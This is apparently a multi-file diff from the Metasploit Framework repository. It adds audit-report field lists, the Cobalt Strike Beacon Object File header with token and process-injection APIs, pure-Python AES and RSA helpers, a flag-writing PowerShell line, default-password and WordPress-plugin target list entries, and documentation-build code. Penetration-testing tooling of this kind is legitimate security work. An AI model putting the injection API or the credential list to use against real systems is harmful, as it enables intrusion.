+AdapDNSAuditLog:
+- UNIQUE_ID
+# - MONITOR_ID
+# - EVENT_NUMBER
+- TIME_GENERATED
+# - EVENT_TYPE
+# - EVENT_TYPE_TEXT
+- EVENT_MACHINE_NAME
+- EVENT_MACHINE_DOMAIN
+# - REMARKS
+# - DNS_SETTING
+# - LOOKUP
+# - DNS_SCOPE
+# - DNS_OBJECT_GUID
+# - DISTINATION_ZONE
+# - OLD_DIRECTORY_PARTITION
+# - USER_ACTION
+- CALLER_USER_DOMAIN
+- CALLER_USER_NAME
+- CLIENT_MACHINE_DOMAIN
+- CALLER_USER_LOGON_ID
+# - DNS_QUERY_NAME
+# - OBJECT_CLASS_TEXT
+# - DNS_SETTING_NAME
+- DISTINGUISHED_NAME
+# - OBJECT_GUID
+# - DNS_ZONE_NAME
+# # - REGISTRY_VALUE
+# - FORMAT_MESSAGE
+# - RECORD_NUMBER
+- CALLER_USER_SID
+# - DNS_SETTING_VALUE
+# - CORRELATION_ID
+# - ATTRIBUTES_NEW_VALUE
+# - ATTRIBUTES_OLD_VALUE
+# - TTL_VALUE
+# - DNS_MGMT_TYPE
+# - DNS_ZONE_TYPE
+# - DNS_ZONE_TYPE_STRING
+- CALLER_USER_DISPLAY_NAME
+- CALLER_USER_DN
+- CALLER_USER_OU_GUID
+- CALLER_USER_GUID
+# - OP_APPLN_CORRELATION_ID
+# - OP_TREE_DELETE
+# - DIRECTORY_PARTITION
+# - ROOT_CAUSE
+# - FILE_NAME
+# - VIRTUALIZATION_INSTANCE
+# - ERROR_CODE_TEXT
+# - DNS_RESPONSE_DATA
+- DNS_SERVER_NAME
+# - LINE_NUMBER
+- CLIENT_MACHINE_IPADDRESS
+- CLIENT_MACHINE_NAME
+# - NEXT_SCAVENGE_SCHEDULE
+# - RECORD_NAME
+# - RUNNING_TIME
+# - TIME_OUT
+# - DNS_NODE
+# - DNS_ZONE_FILE
+- FOREST_NAME
+# - SCAVENGED_NODES
+# - SCAVENGED_PERC
+# - SCAVENGED_RECORDS
+# - SERVICE_NAMES
+# - SLEEPING_TIME
+# - VISITED_NODES
+# - VISITED_ZONES
+AdapADReplicationAuditLog:
+- UNIQUE_ID
+# - MONITOR_ID
+- TIME_GENERATED
+# - RECORD_NUMBER
+- EVENT_MACHINE_NAME
+- EVENT_MACHINE_DOMAIN
+# - EVENT_NUMBER
+# - EVENT_TYPE
+# - EVENT_TYPE_TEXT
+# - FORMAT_MESSAGE
+# - REMARKS
+- CALLER_USER_DOMAIN
+- CALLER_USER_NAME
+- CALLER_USER_SID
+- CALLER_USER_DN
+- CALLER_USER_OU_GUID
+- CALLER_USER_DISPLAY_NAME
+- CALLER_USER_LOGON_ID
+- CALLER_USER_GUID
+- CLIENT_MACHINE_IPADDRESS
+- CLIENT_MACHINE_NAME
+- CLIENT_MACHINE_DOMAIN
+# - ALTERNATE_USER_ACTION
+# - DIRECTORY_PARTITION
+# - ERROR_CODE
+# - ERROR_CODE_TEXT
+# - EXTENDED_REQUEST_CODE
+# - FAILING_DNS_HOST
+# - HIGHEST_USN
+# - INTERSITE_TRANSPORT
+# - LAST_REPLICATION_DATE
+# - OBJECT_GUID
+# - OBJECT_NAME
+# - COMMON_NAME_PATH
+# - OPERATION
+# - REASON
+- REGISTRY_KEY
+# - REMOVE_LINGERING_OBJECTS
+# - SECONDARY_ERROR_VALUE
+- SERVICE_PRINCIPAL_NAME
+- SITE_NAME
+- SOURCE_DIRECTORY_SERVICE
+- SOURCE_DS_DOMAIN_NAME
+- SOURCE_DS_GUID
+- SOURCE_DS_NAME
+- SOURCE_DS_STARTING_ID
+# - THREAD_ID
+# - TIMEOUT_PERIOD
+# - TOMBSTONE_LIFE_TIME
+# - TRANSPORT_NAME
+# - USER_ACTION
+# - ATTRIBUTES_NAME
+# - ATTRIBUTES_VALUE
+# - SOURCE_DRA
+# - DESTINATION_DRA
+# - DESTINATION_DS_NAME
+# - DRS_OPTIONS
+# - REPL_EVENT_COUNT
+# - REPL_STATUS_CODE
+# - SESSION_ID
+# - START_USN
+# - END_USN
+# - TYPE_OF_CHANGE
@@ -0,0 +1,259 @@
+---
+DSPEmailAuditReport:
+- UNIQUE_ID
+- TIME_GENERATED
+# - COMPLETION_TIME
+# - SOURCE_ID
+# - ENDPOINT_ID
+- ENDPOINT_NAME
+- USER_SID
+- USER_NAME
+# - ATTACHMENT_ID
+# - ACCESS_TYPE
+# - ACCESS_TYPE_MESSAGE
+# - PROCESS_NAME
+- MAIL_FROM
+- MAIL_TO
+- MAIL_BCC
+- MAIL_CC
+# - MAIL_SUBJECT
+# - MAIL_SENT_TIME
+# - MAIL_CLASSFICATION_VALUE
+# - MAIL_CLASSFICATION
+# - PROFILE_ID
+- PROFILE_NAME
+# - PROFILETYPE_ID
+# - PROFILETYPE_NAME
+DSPEndpointAuditReport:
+- UNIQUE_ID
+- TIME_GENERATED
+# - COMPLETION_TIME
+# - ENDPOINT_ID
+- ENDPOINT_NAME
+# - SOURCE_ID
+- USER_SID
+- USERNAME
+# - PROCESS_ID
+# - LAST_ACCESS_TIME
+# - LAST_WRITE_TIME
+# - CREATION_TIME
+# - FILE_ATTRIBUTES
+# - UNC_NAME
+# - LOCATION
+# - MESSAGE
+# - FILE_FOLDER_NAME
+# - NEW_FILE_NAME
+# - IMAGE_FILE_NAME
+# - OLD_SHARE_PATH
+# - NEW_SHARE_PATH
+# - SHARE_ID
+# - IS_SUCCESS_EVENT
+# - IS_DIRECTORY
+# - IS_TRANSACTION
+# - ACTION_ID
+# - ACCESS_MASK
+# - THREAD_ID
+# - CALLBACK_MAJOR_ID
+# - CALLBACK_MINOR_ID
+# - PROFILE_ID
+# - USER_ID
+# - OLD_SACL
+# - NEW_SACL
+# - DIFF_SACL
+# - FILE_SIZE
+- CLIENT_IP
+- CLIENT_HOST
+- OWNER_INFO
+# - OTHERINFO_1
+# - OTHERINFO_2
+# - IS_SENSITIVE_DATA
+# - FILETYPE_EXTENSION
+# - FILETYPE_CATEGORY
+# - ACCESS_FROM
+# - EVENT_GENERATED_BY
+# - LOGIN_ID
+- LOGIN_NAME
+- OWNER_SID
+# - IS_USB_EVENT
+# - IS_NETWORK_COPY
+# - LAST_KNOWN_COPY
+# - PROFILETYPE_ID
+# - PROFILETYPE_NAME
+DSPEndpointClassificationReport:
+- UNIQUE_ID
+- TIME_GENERATED
+# - COMPLETION_TIME
+# - SOURCE_ID
+# - ENDPOINT_ID
+- ENDPOINT_NAME
+- USER_SID
+- USER_NAME
+# - CLASSIFICATION_ID
+# - CLASSIFICATION_VALUE
+# - CLASSIFICATION_MSG
+# - LOCAL_PATH
+# - FILE_FOLDER_NAME
+# - LAST_ACCESS_TIME
+# - LAST_WRITE_TIME
+# - CREATION_TIME
+# - FILE_ATTRIBUTES
+- FILE_OWNER
+- OWNER_SID
+# - FILE_SIZE
+# - FILETYPE_EXTENSION
+# - IS_HIDDEN
+# - MEDIA_FILE
+# - FILETYPE_EXTENSION_CATEGORY
+DSPEndpointIncidentReport:
+- INCIDENT_ID
+- SOURCE
+# - MODULE_NAME
+# - INCIDENT_TIME
+# - COMPLETION_TIME
+- TIME_GENERATED
+# - MESSAGE
+# - LOCATION
+# - ENDPOINT_ID
+# - INCIDENT_STATUS
+# - VIOLATED_POLICY
+# - DOMAIN_ID
+- ENDPOINT_NAME
+- USERNAME
+# - USER_ID
+# - LAST_ACCESS_TIME
+# - LAST_WRITE_TIME
+# - FILE_SIZE
+# - CREATION_TIME
+# - REPORT_GENERATION_ID
+# - NEW_FILE_NAME
+# - IMAGE_FILE_NAME
+# - FILE_FOLDER_NAME
+- USER_SID
+# - FILETYPE_EXTENSION
+# - IS_USB_EVENT
+- NOTIFY_NAME
+- MAIL_FROM
+- MAIL_TO
+- MAIL_BCC
+- MAIL_CC
+# - MAIL_SUBJECT
+# - MAIL_SENT_TIME
+# - MAIL_CLASSFICATION
+# - PRINTER_NAME
+# - FILENAME
+# - PORT_NAME
+- MACHINE_NAME
+- PRINTER_USERNAME
+# - TOTAL_PAGES
+- CLIENTIPLIST
+- URL
+# - CLASSIFICATION_VALUE
+# - INCIDENT_PROFILE_ID
+# - INCIDENT_PROFILE_NAME
+# - INCIDENT_SEVERITY
+# - PROFILETYPE_ID
+# - PROFILETYPE_NAME
+# - IS_NETWORK_COPY
+# - LAST_KNOWN_COPY
+- CLIENT_HOST
+DspEndpointPrinterAuditReport:
+- UNIQUE_ID
+- TIME_GENERATED
+# - COMPLETION_TIME
+# - SOURCE_ID
+# - ENDPOINT_ID
+- ENDPOINT_NAME
+- USER_SID
+- USER_NAME
+# - PRINTER_NAME
+# - FILENAME
+# - LOCAL_PATH
+# - PORT_NAME
+- MACHINE_NAME
+- PRINTER_USERNAME
+- NOTIFY_NAME
+# - TOTAL_PAGES
+# - FILE_SIZE
+# - CREATION_TIME
+- CLIENTIPLIST
+# - PROFILE_ID
+- PROFILE_NAME
+# - PROFILETYPE_ID
+# - PROFILETYPE_NAME
+DspEndpointWebAuditReport:
+- UNIQUE_ID
+- TIME_GENERATED
+# - SOURCE_ID
+# - ENDPOINT_ID
+- ENDPOINT_NAME
+- USER_SID
+- USER_NAME
+# - NEW_FILE_NAME
+# - FILE_SIZE
+# - FILETYPE_EXTENSION
+# - PROCESS_NAME
+# - MESSAGE
+# - URL
+- CLIENT_IP
+# - PROFILE_ID
+- PROFILE_NAME
+DSPFileAnalysisAlerts:
+- INCIDENT_ID
+# - VIOLATED_PROFILE
+# - SERVER_ID
+# - DRIVE_LETTER
+# - SOURCE_ID
+- TIME_GENERATED
+# - SECURITY_ID
+- SERVERNAME
+# - FILE_ATTRIBUTES
+# - LAST_ACCESS_TIME
+# - LAST_WRITE_TIME
+# - FILE_SIZE
+# - CREATION_TIME
+# - REPORT_GENERATION_ID
+# - YEAR_CREATED
+# - FILE_FOLDER_NAME
+# - LOCAL_PATH
+# - FILETYPE_EXTENSION
+# - IS_HIDDEN
+# - IS_DIRECTORY
+# - IS_STALE
+# - NON_BUSINESS_FILE
+# - FILETYPE_EXTENSION_CATEGORY
+RAAlertHistory:
+- INCIDENT_ID
+# - FILE_NAME
+# - FILE_TYPE
+# - LOCATION
+- SERVER_NAME
+# - POLICY_ID
+# - POLICY_NAME
+- TIME_GENERATED
+# - NO_OF_OCCURRENCES
+- FILE_OWNER
+# - DATA_SOURCE
+# - RISK_SCORE
+# - ENTITY_ID
+RAIncidents:
+- INCIDENT_ID
+# - FILE_NAME
+# - FILE_TYPE
+# - LOCATION
+- SERVER_NAME
+# - POLICY_ID
+# - POLICY_NAME
+- TIME_GENERATED
+# - NO_OF_OCCURRENCES
+- FILE_OWNER
+# - DATA_SOURCE
+# - RAISED_INCIDENT
+# - SOURCE_ID
+# - RISK_SCORE
+# - VIOLATION_SCORE
+# - POLICY_SCORE
+# - PERMISSION_SCORE
+# - AUDIT_SCORE
+# - USER_SCORE
+# - SCORE_DESCRIPTION
+# - ENTITY_ID
@@ -0,0 +1,69 @@
+/*
+ * Beacon Object Files (BOF)
+ * -------------------------
+ * A Beacon Object File is a light-weight post exploitation tool that runs
+ * with Beacon's inline-execute command.
+ *
+ * Additional BOF resources are available here:
+ *   - https://github.com/Cobalt-Strike/bof_template
+ *
+ * Cobalt Strike 4.x
+ * ChangeLog:
+ *    1/25/2022: updated for 4.5
+ */
+
+/* data API */
+typedef struct {
+	char * original; /* the original buffer [so we can free it] */
+	char * buffer;   /* current pointer into our buffer */
+	int    length;   /* remaining length of data */
+	int    size;     /* total size of this buffer */
+} datap;
+
+DECLSPEC_IMPORT void    BeaconDataParse(datap * parser, char * buffer, int size);
+DECLSPEC_IMPORT char *  BeaconDataPtr(datap * parser, int size);
+DECLSPEC_IMPORT int     BeaconDataInt(datap * parser);
+DECLSPEC_IMPORT short   BeaconDataShort(datap * parser);
+DECLSPEC_IMPORT int     BeaconDataLength(datap * parser);
+DECLSPEC_IMPORT char *  BeaconDataExtract(datap * parser, int * size);
+
+/* format API */
+typedef struct {
+	char * original; /* the original buffer [so we can free it] */
+	char * buffer;   /* current pointer into our buffer */
+	int    length;   /* remaining length of data */
+	int    size;     /* total size of this buffer */
+} formatp;
+
+DECLSPEC_IMPORT void    BeaconFormatAlloc(formatp * format, int maxsz);
+DECLSPEC_IMPORT void    BeaconFormatReset(formatp * format);
+DECLSPEC_IMPORT void    BeaconFormatAppend(formatp * format, char * text, int len);
+DECLSPEC_IMPORT void    BeaconFormatPrintf(formatp * format, char * fmt, ...);
+DECLSPEC_IMPORT char *  BeaconFormatToString(formatp * format, int * size);
+DECLSPEC_IMPORT void    BeaconFormatFree(formatp * format);
+DECLSPEC_IMPORT void    BeaconFormatInt(formatp * format, int value);
+
+/* Output Functions */
+#define CALLBACK_OUTPUT      0x0
+#define CALLBACK_OUTPUT_OEM  0x1e
+#define CALLBACK_OUTPUT_UTF8 0x20
+#define CALLBACK_ERROR       0x0d
+
+DECLSPEC_IMPORT void   BeaconOutput(int type, char * data, int len);
+DECLSPEC_IMPORT void   BeaconPrintf(int type, char * fmt, ...);
+
+
+/* Token Functions */
+DECLSPEC_IMPORT BOOL   BeaconUseToken(HANDLE token);
+DECLSPEC_IMPORT void   BeaconRevertToken();
+DECLSPEC_IMPORT BOOL   BeaconIsAdmin();
+
+/* Spawn+Inject Functions */
+DECLSPEC_IMPORT void   BeaconGetSpawnTo(BOOL x86, char * buffer, int length);
+DECLSPEC_IMPORT void   BeaconInjectProcess(HANDLE hProc, int pid, char * payload, int p_len, int p_offset, char * arg, int a_len);
+DECLSPEC_IMPORT void   BeaconInjectTemporaryProcess(PROCESS_INFORMATION * pInfo, char * payload, int p_len, int p_offset, char * arg, int a_len);
+DECLSPEC_IMPORT BOOL   BeaconSpawnTemporaryProcess(BOOL x86, BOOL ignoreToken, STARTUPINFO * si, PROCESS_INFORMATION * pInfo);
+DECLSPEC_IMPORT void   BeaconCleanupProcess(PROCESS_INFORMATION * pInfo);
+
+/* Utility Functions */
+DECLSPEC_IMPORT BOOL   toWideChar(char * src, wchar_t * dst, int max);
@@ -0,0 +1,229 @@
+import copy
+import struct
+import sys
+
+
+def chunks(lst, n):
+    for i in range(0, len(lst), n):
+        yield lst[i:i + n]
+
+
+def _cw(word):
+    return (word[0] << 24) | (word[1] << 16) | (word[2] << 8) | word[3]
+
+
+def _s2b(text):
+    return list(ord(c)for c in text)
+
+
+def _b2s(binary):
+    return "".join(chr(b)for b in binary)
+
+
+if sys.version_info[0] >= 3:
+    xrange = range
+
+    def _s2b(text):
+        if isinstance(text, bytes):
+            return text
+        return [ord(c)for c in text]
+
+    def _b2s(binary):
+        return bytes(binary)
+else:
+    def bytes(s, e): return s
+
+
+def _gmul(a, b):
+    r = 0
+    while b:
+        if b & 1:
+            r ^= a
+        a <<= 1
+        if a > 255:
+            a ^= 0x11B
+        b >>= 1
+    return r
+
+
+def _mix(n, vec):
+    return sum(_gmul(n, v) << (24 - 8 * shift) for shift, v in enumerate(vec))
+
+
+def _ror32(n):
+    return (n & 255) << 24 | n >> 8
+
+
+def _rcon():
+    return [_gmul(1, 1 << n) for n in range(30)]
+
+
+def _Si(S):
+    return [S.index(n) for n in range(len(S))]
+
+
+def _mixl(S, vec):
+    return [_mix(s, vec) for s in S]
+
+
+def _rorl(T):
+    return [_ror32(t) for t in T]
+
+
+empty = struct.pack('')
+
+
+class AESCBC(object):
+    nrs = {16: 10, 24: 12, 32: 14}
+    rcon = _rcon()
+    S = [
+        99, 124, 119, 123, 242, 107, 111, 197, 48, 1, 103, 43, 254, 215, 171,
+        118, 202, 130, 201, 125, 250, 89, 71, 240, 173, 212, 162, 175, 156,
+        164, 114, 192, 183, 253, 147, 38, 54, 63, 247, 204, 52, 165, 229, 241,
+        113, 216, 49, 21, 4, 199, 35, 195, 24, 150, 5, 154, 7, 18, 128, 226,
+        235, 39, 178, 117, 9, 131, 44, 26, 27, 110, 90, 160, 82, 59, 214, 179,
+        41, 227, 47, 132, 83, 209, 0, 237, 32, 252, 177, 91, 106, 203, 190, 57,
+        74, 76, 88, 207, 208, 239, 170, 251, 67, 77, 51, 133, 69, 249, 2, 127,
+        80, 60, 159, 168, 81, 163, 64, 143, 146, 157, 56, 245, 188, 182, 218,
+        33, 16, 255, 243, 210, 205, 12, 19, 236, 95, 151, 68, 23, 196, 167,
+        126, 61, 100, 93, 25, 115, 96, 129, 79, 220, 34, 42, 144, 136, 70, 238,
+        184, 20, 222, 94, 11, 219, 224, 50, 58, 10, 73, 6, 36, 92, 194, 211,
+        172, 98, 145, 149, 228, 121, 231, 200, 55, 109, 141, 213, 78, 169, 108,
+        86, 244, 234, 101, 122, 174, 8, 186, 120, 37, 46, 28, 166, 180, 198,
+        232, 221, 116, 31, 75, 189, 139, 138, 112, 62, 181, 102, 72, 3, 246,
+        14, 97, 53, 87, 185, 134, 193, 29, 158, 225, 248, 152, 17, 105, 217,
+        142, 148, 155, 30, 135, 233, 206, 85, 40, 223, 140, 161, 137, 13, 191,
+        230, 66, 104, 65, 153, 45, 15, 176, 84, 187, 22
+    ]
+    Si = _Si(S)
+    T1 = _mixl(S, (2, 1, 1, 3))
+    T2 = _rorl(T1)
+    T3 = _rorl(T2)
+    T4 = _rorl(T3)
+    T5 = _mixl(Si, (14, 9, 13, 11))
+    T6 = _rorl(T5)
+    T7 = _rorl(T6)
+    T8 = _rorl(T7)
+    U1 = _mixl(range(256), (14, 9, 13, 11))
+    U2 = _rorl(U1)
+    U3 = _rorl(U2)
+    U4 = _rorl(U3)
+
+    def __init__(self, key):
+        if len(key)not in (16, 24, 32):
+            raise ValueError('Invalid key size')
+        rds = self.nrs[len(key)]
+        self._Ke = [[0] * 4 for i in xrange(rds + 1)]
+        self._Kd = [[0] * 4 for i in xrange(rds + 1)]
+        rnd_kc = (rds + 1) * 4
+        KC = len(key) // 4
+        tk = [struct.unpack('>i', key[i:i + 4])[0]
+              for i in xrange(0, len(key), 4)]
+        rconpointer = 0
+        t = KC
+        for i in xrange(0, KC):
+            self._Ke[i // 4][i % 4] = tk[i]
+            self._Kd[rds - (i // 4)][i % 4] = tk[i]
+        while t < rnd_kc:
+            tt = tk[KC - 1]
+            tk[0] ^= ((self.S[(tt >> 16) & 255] << 24) ^ (self.S[(tt >> 8) & 255] << 16) ^ (
+                self.S[tt & 255] << 8) ^ self.S[(tt >> 24) & 255] ^ (self.rcon[rconpointer] << 24))
+            rconpointer += 1
+            if KC != 8:
+                for i in xrange(1, KC):
+                    tk[i] ^= tk[i - 1]
+            else:
+                for i in xrange(1, KC // 2):
+                    tk[i] ^= tk[i - 1]
+                tt = tk[KC // 2 - 1]
+                tk[KC // 2] ^= (self.S[tt & 255] ^ (self.S[(tt >> 8) & 255] << 8) ^
+                                (self.S[(tt >> 16) & 255] << 16) ^ (self.S[(tt >> 24) & 255] << 24))
+                for i in xrange(KC // 2 + 1, KC):
+                    tk[i] ^= tk[i - 1]
+            j = 0
+            while j < KC and t < rnd_kc:
+                self._Ke[t // 4][t % 4] = tk[j]
+                self._Kd[rds - (t // 4)][t % 4] = tk[j]
+                j += 1
+                t += 1
+        for r in xrange(1, rds):
+            for j in xrange(0, 4):
+                tt = self._Kd[r][j]
+                self._Kd[r][j] = (self.U1[(tt >> 24) & 255] ^ self.U2[(
+                    tt >> 16) & 255] ^ self.U3[(tt >> 8) & 255] ^ self.U4[tt & 255])
+
+    def _encdec(self, data, K, s, S, L1, L2, L3, L4):
+        if len(data) != 16:
+            raise ValueError('wrong block length')
+        rds = len(K) - 1
+        (s1, s2, s3) = s
+        a = [0, 0, 0, 0]
+        t = [(_cw(data[4 * i:4 * i + 4]) ^ K[0][i])for i in xrange(0, 4)]
+        for r in xrange(1, rds):
+            for i in xrange(0, 4):
+                a[i] = L1[(t[i] >> 24) & 255]
+                a[i] ^= L2[(t[(i + s1) % 4] >> 16) & 255]
+                a[i] ^= L3[(t[(i + s2) % 4] >> 8) & 255]
+                a[i] ^= L4[t[(i + s3) % 4] & 255] ^ K[r][i]
+            t = copy.copy(a)
+        rst = []
+        for i in xrange(0, 4):
+            tt = K[rds][i]
+            rst.append((S[(t[i] >> 24) & 255] ^ (tt >> 24)) & 255)
+            rst.append((S[(t[(i + s1) % 4] >> 16) & 255] ^ (tt >> 16)) & 255)
+            rst.append((S[(t[(i + s2) % 4] >> 8) & 255] ^ (tt >> 8)) & 255)
+            rst.append((S[t[(i + s3) % 4] & 255] ^ tt) & 255)
+        return rst
+
+    def enc_in(self, pt):
+        return self._encdec(
+            pt, self._Ke, [
+                1, 2, 3], self.S, self.T1, self.T2, self.T3, self.T4)
+
+    def dec_in(self, ct):
+        return self._encdec(
+            ct, self._Kd, [
+                3, 2, 1], self.Si, self.T5, self.T6, self.T7, self.T8)
+
+    def pad(self, pt):
+        c = 16 - (len(pt) % 16)
+        return pt + bytes(chr(c) * c, 'utf-8')
+
+    def unpad(self, pt):
+        c = pt[-1]
+        if not isinstance(c, int):
+            c = ord(c)
+        return pt[:-c]
+
+    def encrypt(self, iv, pt):
+        if len(iv) != 16:
+            raise ValueError('initialization vector must be 16 bytes')
+        else:
+            self._lcb = _s2b(iv)
+        pt = self.pad(pt)
+        return empty.join([self.enc_b(b)for b in chunks(pt, 16)])
+
+    def enc_b(self, pt):
+        if len(pt) != 16:
+            raise ValueError('plaintext block must be 16 bytes')
+        pt = _s2b(pt)
+        pcb = [(p ^ l)for (p, l) in zip(pt, self._lcb)]
+        self._lcb = self.enc_in(pcb)
+        return _b2s(self._lcb)
+
+    def decrypt(self, iv, ct):
+        if len(iv) != 16:
+            raise ValueError('initialization vector must be 16 bytes')
+        else:
+            self._lcb = _s2b(iv)
+        if len(ct) % 16 != 0:
+            raise ValueError('ciphertext must be a multiple of 16')
+        return self.unpad(empty.join([self.dec_b(b)for b in chunks(ct, 16)]))
+
+    def dec_b(self, ct):
+        if len(ct) != 16:
+            raise ValueError('ciphertext block must be 16 bytes')
+        cb = _s2b(ct)
+        pt = [(p ^ l)for (p, l) in zip(self.dec_in(cb), self._lcb)]
+        self._lcb = cb
+        return _b2s(pt)
@@ -0,0 +1,77 @@
+import sys
+import math
+import random
+import binascii as ba
+import os
+from struct import unpack as u
+from struct import pack
+is2 = sys.version_info[0] < 3
+
+
+def bt(b):
+    if is2:
+        return b
+    return ord(b)
+
+
+def b2i(b):
+    return int(ba.b2a_hex(b), 16)
+
+
+def i2b(i):
+    h = '%x' % i
+    if len(h) % 2 == 1:
+        h = '0' + h
+    if not is2:
+        h = h.encode('utf-8')
+    return ba.a2b_hex(h)
+
+
+def rs(a, o):
+    if a[o] == bt(pack('B', 0x81)):
+        return (u('B', a[o + 1])[0], 2 + o)
+    elif a[o] == bt(pack('B', 0x82)):
+        return (u('>H', a[o + 1:o + 3])[0], 3 + o)
+
+
+def ri(b, o):
+    i, o = rs(b, o)
+    return (b[o:o + i], o + i)
+
+
+def b2me(b):
+    if b[0] != bt(pack('B', 0x30)):
+        return (None, None)
+    _, o = rs(b, 1)
+    if b[o] != bt(pack('B', 2)):
+        return (None, None)
+    (m, o) = ri(b, o + 1)
+    if b[o] != bt(pack('B', 2)):
+        return (None, None)
+    e = b[o + 2:]
+    return (b2i(m), b2i(e))
+
+
+def der2me(d):
+    if d[0] != bt(pack('B', 0x30)):
+        return (None, None)
+    _, o = rs(d, 1)
+    while o < len(d):
+        if d[o] == bt(pack('B', 0x30)):
+            o += u('B', d[o + 1:o + 2])[0]
+        elif d[o] == bt(pack('B', 0x05)):
+            o += 2
+        elif d[o] == bt(pack('B', 0x03)):
+            _, o = rs(d, o + 1)
+            return b2me(d[o + 1:])
+        else:
+            return (None, None)
+
+
+def rsa_enc(der, msg):
+    m, e = der2me(der)
+    h = pack('BB', 0, 2)
+    d = pack('B', 0)
+    l = 256 - len(h) - len(msg) - len(d)
+    p = os.urandom(512).replace(pack('B', 0), pack(''))
+    return i2b(pow(b2i(h + p[:l] + d + msg), e, m))
@@ -0,0 +1,2 @@
+$someText = "Hello!" ; $someText > "C:\flag.txt"
+
@@ -1,3 +1,4 @@
 calvin
 123456
 password
+user1234
@@ -54,3 +54,4 @@ easy-wp-smtp
 duplicator_download
 custom-registration-form-builder-with-submission-manager
 woocommerce-abandoned-cart
+elementor
@@ -32,6 +32,9 @@ module Build
    end
  end

+  class ConfigValidationError < StandardError
+  end
+
  # Configuration for generating the new website hierarchy, from the existing metasploit-framework wiki
  class Config
    include Enumerable
@@ -43,34 +46,34 @@ module Build
    def validate!
      configured_paths = all_file_paths
      missing_paths = available_paths.map { |path| path.gsub("#{WIKI_PATH}/", '') } - ignored_paths - existing_docs - configured_paths
-      raise "Unhandled paths #{missing_paths.join(', ')}" if missing_paths.any?
+      raise ConfigValidationError, "Unhandled paths #{missing_paths.join(', ')}" if missing_paths.any?

      each do |page|
        page_keys = page.keys
        allowed_keys = %i[old_wiki_path path new_base_name nav_order title new_path folder children has_children parents]
        invalid_keys = page_keys - allowed_keys
-        raise "#{page} had invalid keys #{invalid_keys.join(', ')}" if invalid_keys.any?
+        raise ConfigValidationError, "#{page} had invalid keys #{invalid_keys.join(', ')}" if invalid_keys.any?
      end

      # Ensure unique folder names
      folder_titles = to_enum.select { |page| page[:folder] }.map { |page| page[:title] }
      duplicate_folder = folder_titles.tally.select { |_name, count| count > 1 }
-      raise "Duplicate folder titles, will cause issues: #{duplicate_folder}" if duplicate_folder.any?
+      raise ConfigValidationError, "Duplicate folder titles, will cause issues: #{duplicate_folder}" if duplicate_folder.any?

      # Ensure no folder titles match file titles
      page_titles = to_enum.reject { |page| page[:folder] }.map { |page| page[:title] }
      title_collisions = (folder_titles & page_titles).tally
-      raise "Duplicate folder/page titles, will cause issues: #{title_collisions}" if title_collisions.any?
+      raise ConfigValidationError, "Duplicate folder/page titles, will cause issues: #{title_collisions}" if title_collisions.any?

      # Ensure there are no files being migrated to multiple places
      page_paths = to_enum.reject { |page| page[:path] }.map { |page| page[:title] }
      duplicate_page_paths = page_paths.tally.select { |_name, count| count > 1 }
-      raise "Duplicate paths, will cause issues: #{duplicate_page_paths}" if duplicate_page_paths.any?
+      raise ConfigValidationError, "Duplicate paths, will cause issues: #{duplicate_page_paths}" if duplicate_page_paths.any?

      # Ensure new file paths are only alphanumeric and hyphenated
      new_paths = to_enum.map { |page| page[:new_path] }
      invalid_new_paths = new_paths.reject { |path| File.basename(path) =~ /^[a-zA-Z0-9_-]*\.md$/ }
-      raise "Only alphanumeric and hyphenated file names required: #{invalid_new_paths}" if invalid_new_paths.any?
+      raise ConfigValidationError, "Only alphanumeric and hyphenated file names required: #{invalid_new_paths}" if invalid_new_paths.any?
    end

    def available_paths
@@ -293,6 +296,15 @@ module Build
        '@scanner',
        '@yieldparam',
        '@yieldreturn',
+        '@compressed',
+        '@content',
+        '@path',
+        '@sha1',
+        '@type',
+        '@git_repo_uri',
+        '@git_addr',
+        '@git_objs',
+        '@refs',
      ]

      # Replace any dangling github usernames, i.e. `@foo` - but not `[@foo](http://...)` or `email@example.com`
@@ -337,7 +349,12 @@ module Build
    # - Converts the existing Wiki markdown pages into a Jekyll format
    # - Optionally updates the existing Wiki markdown pages with a link to the new website location
    def run(config, options = {})
-      config.validate!
+      begin
+        config.validate!
+      rescue
+        puts "[!] Validation failed. Please verify navigation.rb is valid, as well as the markdown file"
+        raise
+      end

      # Clean up new docs folder in preparation for regenerating it entirely from the latest wiki
      result_folder = File.join('.', 'docs')
@@ -9,35 +9,40 @@ Keybase.io is used by Metasploit as an easy way to verify identities of committe

 | Github Username                                   | Keybase.io Username                                |
 | ------------------------------------------------- | -------------------------------------------------- |
-| [@acammack-r7](https://github.com/acammack-r7)    | [acammackr7](https://keybase.io/acammackr7)        |
+| [@adfoster-r7](https://github.com/adfoster-r7)    | [adfosterr7](https://keybase.io/adfosterr7)        |
 | [@bcoles](https://github.com/bcoles)              | [bcoles](https://keybase.io/bcoles)                |
-| [@busterb](https://github.com/busterb)            | [busterb](https://keybase.io/busterb)              |
 | [@bwatters-r7](https://github.com/bwatters-r7)    | [bwatters](https://keybase.io/bwatters)            |
 | [@ccondon-r7](https://github.com/ccondon-r7)      | [catc0n](https://keybase.io/catc0n)                |
-| [@cdelafuente-r7](https://github.com/cdelafuente-r7)|[cdelafuente](https://keybase.io/cdelafuente)    |
+| [@cdelafuente-r7](https://github.com/cdelafuente-r7)|[cdelafuente](https://keybase.io/cdelafuente)     |
+| [@cgranleese-r7](https://github.com/cgranleese-r7)|                                                    |
 | [@chiggins](https://github.com/chiggins)          | [chiggins](https://keybase.io/chiggins)            |
-| [@egypt](https://github.com/egypt)                | [egypt](https://keybase.io/egypt)                  |
+| [@dwelch-r7](https://github.com/dwelch-r7)        | [dwelchr7](https://keybase.io/dwelchr7)            |
+| [@erran-r7](https://github.com/erran-r7)          | [err7n](https://keybase.io/err7n)                  |
+| [@ekelly-rapid7](https://github.com/ekelly-rapid7)|                                                    |
 | [@FireFart](https://github.com/FireFart)          | [firefart](https://keybase.io/firefart)            |
 | [@Green-m](https://github.com/Green-m)            | [green-m](https://keybase.io/green_m)              |
 | [@gwillcox-r7](https://github.com/gwillcox-r7)    | [grantwillcox](https://keybase.io/grantwillcox)    |
 | [@h00die](https://github.com/h00die)              | [h00die](https://keybase.io/h00die)                |
-| [@jbarnett-r7](https://github.com/jbarnett-r7)    | [jmbarnett](https://keybase.io/jmbarnett)          |
+| [@hwilson-r7](https://github.com/hwilson-r7)      |                                                    |
+| [@jharris-r7](https://github.com/jharris-r7)      |                                                    |
+| [@jheysel-r7](https://github.com/jheysel-r7)      |                                                    |
 | [@jmartin-r7](https://github.com/jmartin-r7)      | [jmartinr7](https://keybase.io/jmartinr7)          |
-| [@lsato-r7](https://github.com/lsato-r7)          | [louissato](https://keybase.io/lsato)              |
